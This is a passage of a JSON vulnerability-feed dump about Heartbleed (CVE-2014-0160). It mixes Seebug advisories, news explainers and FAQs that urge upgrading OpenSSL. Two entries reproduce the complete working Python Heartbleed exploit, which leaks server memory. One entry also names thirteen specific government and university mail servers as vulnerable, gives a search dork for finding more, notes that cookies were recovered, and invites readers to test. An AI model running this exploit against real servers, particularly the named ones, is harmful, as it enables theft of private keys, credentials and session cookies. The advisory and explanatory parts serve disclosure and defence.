ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/", "modified": "2014-04-08T00:00:00", "published": "2014-04-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62086", "id": "SSV:62086", "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086"}, {"lastseen": "2017-11-19T17:27:32", "bulletinFamily": "exploit", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6253\u5305\u4e86\u4e00\u5806\u7f51\u7ad9,\u5185\u5b58\u91cc\u6709cookies :D\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\neYouMail 5 inurl:edu\n\u641c\u7d20\u51fa\u6765\u5c31\u80fd\u6709\u6f0f\u6d1e\u7684\u673a\u738790%\u5de6\u53f3\n\u524d\u4e09\u9875\u6210\u529f\u7684\u7ed3\u679c\n\n\n```\nmail.jn.gov.cn\nmail.hpu.edu.cn\nmail.just.edu.cn\nmail.hnust.edu.cn\nmail.tjut.edu.cn\nmail.shupl.edu.cn\nmail.haust.edu.cn\nmail.dufe.edu.cn\nmail.jliae.edu.cn\nmail.hist.edu.cn\ndn1s.cmc.edu.cn\nmail.hbpu.edu.cn\nmail.dzu.edu.cn\n```\n\n\nPOC\u9001\u4e0a \u81ea\u5df1\u6d4b\u8bd5\n\n\n```\n#!/usr/bin/python\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg\" alt=\"1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg\" alt=\"2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\n\u5185\u5b58\u91cc\u6709cookies \n\n[<img src=\"https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg\" alt=\"3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "modified": "2014-04-11T00:00:00", "published": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "title": "\u4ebf\u90ae\u67d0\u7248\u672cOPENSSL heartbleed \u901a\u6740", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:16", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nBarracuda\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nBarracuda\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBarracuda CudaTel Communication Server 2.x\r\nBarracuda CudaTel Communication Server 3.x\r\nBarracuda Firewall 6.x\r\nBarracuda Link Balancer 2.x\r\nBarracuda Load Balancer\r\nBarracuda Load Balancer 4.x\r\nBarracuda Load Balancer ADC 5.x\r\nBarracuda Message Archiver\r\nBarracuda Message Archiver 3.x\r\nBarracuda Web Application Firewall 7.x\r\nBarracuda Web Filter\r\nBarracuda Web Filter 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://www.barracuda.com/blogs/pmblog?bid=2279", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62181", "id": "SSV:62181", "title": "Barracuda\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:27:57", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nNicira Network Virtualization Platform (NVP) 3.x\r\nVMware ESXi 5.x\r\nVMware NSX 4.x\r\nVMware NSX 6.x\r\nVMware Fusion 6.x\r\nVmware Horizon Mirage 4.x\r\nVMware Horizon View 5.x\r\nVMware Horizon View Client 2.x\r\nVMware Horizon Workspace 1.x\r\nVMware OVF Tool 3.x\r\nVMware vCenter Server 5.x\r\nVMware vCloud Networking and Security (vCNS) 5.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.vmware.com", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62199", "id": "SSV:62199", "title": "VMware\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:21", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nBlackBerry Link\u662f\u9ed1\u8393\u8bbe\u5907\u7684\u540c\u6b65\u8f6f\u4ef6\u3002\r\n\r\nBlackBerry Link\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBlackBerry Link 1.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.blackberry.com", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62182", "id": "SSV:62182", "title": "BlackBerry Link OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:53", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nLibreOffice\u662f\u4e00\u5957\u53ef\u4e0e\u5176\u4ed6\u4e3b\u8981\u529e\u516c\u5ba4\u8f6f\u4f53\u76f8\u5bb9\u7684\u5957\u4ef6\uff0c\u53ef\u5728\u5404\u79cd\u5e73\u53f0\u4e0a\u6267\u884c\u3002\r\n\r\nLibreOffice\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nLibreOffice 4.x\nLibreOffice 4.2.3\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.libreoffice.org/", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62190", "id": "SSV:62190", "title": "LibreOffice OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:52", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nHP\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nHP\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nHP Onboard Administrator 4.x\r\nHP AssetManager 9.x\r\nHP Diagnostics 9.x\r\nHP IT Executive Scorecard 9.x\r\nHP LoadRunner 11.x\r\nHP LoadRunner 12.x\r\nHP OpenView Connect-It (CIT) 9.x\r\nHP Performance Center 11.x\r\nHP Performance Center 12.x\r\nHP Server Automation 10.x\r\nHP Service Manager 9.x\r\nHP Smart Update Manager (HP SUM) 6.x\r\nHP System Management Homepage 7.x\r\nHP UCMDB Browser 1.x\r\nHP UCMDB Browser 2.x\r\nHP UCMDB Browser 3.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 10.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 9.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.hp.com", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62186", "id": "SSV:62186", "title": "HP\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "thn": [{"lastseen": "2018-01-27T09:18:11", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-3SCoP4FOfiE/U0RKMR7pksI/AAAAAAAAbHo/1YEQztc6eEw/s1600/OpenSSL-Heartbleed-vulnerability-CVE-2014-0160.png>)\n\nIt is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible. \n\n \n\n\nAs this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet.\n\n \n\n\nThe bug was independently discovered by security firm _[Codenomicon](<http://www.codenomicon.com/>)_ along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) [encryption](<https://thehackernews.com/search/label/encryption>) used to secure the Internet.\n\n \n\n\nOpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\n**HEARTBLEED BUG**\n\nThe discoverer of the vulnerability dubbed the bug as \u2018_[Heartbleed bug](<http://heartbleed.com/>)_\u2019, as the exploit rests on a bug in the implementation of OpenSSL\u2019s TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520).\n\n \n\n\nThis critical bug with code ID_ CVE-2014-0160_, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely.\n\n \n\n\n\u201c_We have tested some of our own services from attacker\u2019s perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication_.\u201d\n\n \n\n\nThe [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) in the OpenSSL\u2019s transport layer security (TSL) protocols\u2019 heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than [Apple\u2019s recent SSL bug](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>), which outcropped the possibility for man-in-the-middle (MitM) attacks.\n\n \n\n\nAs the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw [posted on Github](<https://gist.github.com/takeshixx/10107280>). On this [website](<https://filippo.io/Heartbleed/>), you can check if your web server is vulnerable or not.\n\n \n\n\n\"_Bugs in single software or library come and go and are fixed by new versions,_\" the researchers who discovered the vulnerability wrote in a blog post published Monday. \"_However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously._\"\n\n \n\n\nFixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to [OpenSSL 1.0.1g](<https://www.openssl.org/>). The users running older version of OpenSSL are safe. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "modified": "2014-04-12T09:01:01", "published": "2014-04-08T08:23:00", "id": "THN:0F7112302CBABF46D19CACCCFA6103C5", "href": "https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html", "type": "thn", "title": "Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:17:11", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s1600/heartbleed.png>)\n\n_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), The Heartbleed bug is a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL, a popular version of the Transport Layer Security (TLS) protocol.\n\n \n\n\n**2.) HOW IT WORKS?**\n\nFor SSL to work, your computer needs to communicate to the server via sending '_**heartbeats**_' that keep informing the server that client (computer) is online (alive).\n\n \n\n\nHeartbleed attack allows an attacker to retrieve a block of memory of the server up to 64kb in response directly from the vulnerable server via sending the malicious heartbeat and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\n \n\n\nIt opens doors for the cyber criminals to extract sensitive data directly from the server's memory without leaving any traces.\n\n[](<https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png>) \n--- \n_xkcd comic http://xkcd.com/1354/_ \n**3.) HEARTBLEED ATTACK RELIES ON MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to deal with a Man-in-the-Middle (MitM) attack. But using Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could set up a fake website that passes the security verification.\n\n \n\n\nAn attacker could also decrypt the traffic passing between a client and a server i.e. Perfect man-in-the-middle attack on HTTPS connection.\n\n \n\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so it can be used to attack clients as well as servers. An Attacker can obtain up to 64K memory from the server or client as well that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\n \n\n\nResearcher [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) two-thirds of the world's servers i.e. half a million servers are affected by the Heartbleed Bug, including websites, email, and instant messaging services.\n\n \n**Video Explanation:** \n\n\n**5.) HOW HEARTBLEED AFFECTS SMARTPHONES?**\n\nSmartphone is the best practical example of Client side 